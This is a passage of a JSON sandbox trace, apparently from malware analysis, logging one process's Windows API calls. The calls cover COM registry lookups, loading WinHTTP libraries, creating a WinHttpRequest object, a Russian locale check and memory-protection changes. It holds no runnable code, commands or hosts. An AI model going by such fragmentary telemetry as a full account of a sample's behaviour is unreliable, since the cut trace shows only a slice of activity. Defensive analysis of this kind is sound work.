                "value": "0x0000036e"
              },
              {
                "name": "SubKey",
                "value": "InprocServer32"
              },
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 1105
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": "InprocServer32"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 1106
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 1107
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "%SystemRoot%\\system32\\winhttpcom.dll"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)"
              }
            ],
            "repeated": 1,
            "id": 1108
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": "ThreadingModel"
              },
              {
                "name": "Data",
                "value": "Apartment"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel"
              }
            ],
            "repeated": 0,
            "id": 1109
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              }
            ],
            "repeated": 0,
            "id": 1110
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 1111
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1112
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\xa0\\x92\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x93\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1113
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32"
              }
            ],
            "repeated": 0,
            "id": 1114
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1115
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000036e"
              },
              {
                "name": "ObjectAttributesName",
                "value": "InprocHandler32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32"
              }
            ],
            "repeated": 0,
            "id": 1116
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 1117
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1118
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\xa0\\x92\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x93\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1119
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler"
              }
            ],
            "repeated": 0,
            "id": 1120
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1121
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000036e"
              },
              {
                "name": "ObjectAttributesName",
                "value": "InprocHandler"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler"
              }
            ],
            "repeated": 0,
            "id": 1122
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              }
            ],
            "repeated": 0,
            "id": 1123
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x1400824ff",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\winhttpcom"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed5f30000"
              }
            ],
            "repeated": 0,
            "id": 1124
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x1400824ff",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\winhttpcom.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed5f30000"
              }
            ],
            "repeated": 0,
            "id": 1125
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x1400824ff",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "2087C2F4-2CEF-4953-A8AB-66779B670495"
              },
              {
                "name": "ClsContext",
                "value": "0x00000015",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER"
              },
              {
                "name": "riid",
                "value": "00020400-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": "WinHttp.WinHttpRequest.5.1"
              }
            ],
            "repeated": 0,
            "id": 1126
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed5f49000"
              },
              {
                "name": "ModuleName",
                "value": "winhttpcom.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1127
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed5f49000"
              },
              {
                "name": "ModuleName",
                "value": "winhttpcom.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1128
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetUserDefaultLCID",
            "status": true,
            "return": "0x00000419",
            "arguments": [
              {
                "name": "SystemDefaultLangID",
                "value": "0x00000419"
              },
              {
                "name": "LanguageName",
                "value": "Russian"
              }
            ],
            "repeated": 3,
            "id": 1129
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 1130
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtOpenSection",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "WINHTTP.dll"
              }
            ],
            "repeated": 0,
            "id": 1131
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\winhttp.dll"
              }
            ],
            "repeated": 0,
            "id": 1132
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000370"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\winhttp.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1133
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000388"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d",
                "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000370"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\winhttp.dll"
              }
            ],
            "repeated": 0,
            "id": 1134
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000388"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8a20000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0010a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1135
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8b20000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1136
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8af5000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1137
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000388"
              }
            ],
            "repeated": 0,
            "id": 1138
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000370"
              }
            ],
            "repeated": 0,
            "id": 1139
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8af5000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1140
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\WINHTTP"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed8a20000"
              }
            ],
            "repeated": 0,
            "id": 1141
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 9,
            "id": 1142
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "misc",
            "api": "NtQuerySystemInformation",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SystemInformationClass",
                "value": "0",
                "pretty_value": "SystemBasicInformation"
              }
            ],
            "repeated": 0,
            "id": 1143
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "misc",
            "api": "NtQuerySystemInformation",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SystemInformationClass",
                "value": "1",
                "pretty_value": "SystemProcessorInformation"
              }
            ],
            "repeated": 0,
            "id": 1144
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\winhttp"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8a20000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffed8a6e130"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 1145
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed5f49000"
              },
              {
                "name": "ModuleName",
                "value": "winhttpcom.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1146
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed5f49000"
              },
              {
                "name": "ModuleName",
                "value": "winhttpcom.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1147
          },
          {
            "timestamp": "2025-11-20 10:58:33,984",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "winhttp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8a20000"
              }
            ],
            "repeated": 0,
            "id": 1148
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper"
              },
              {
                "name": "DllBase",
                "value": "0x7ffecb2e0000"
              }
            ],
            "repeated": 0,
            "id": 1149
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecb2e0000"
              }
            ],
            "repeated": 0,
            "id": 1150
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper"
              },
              {
                "name": "DllBase",
                "value": "0x7ffecb2e0000"
              }
            ],
            "repeated": 0,
            "id": 1151
          },
          {
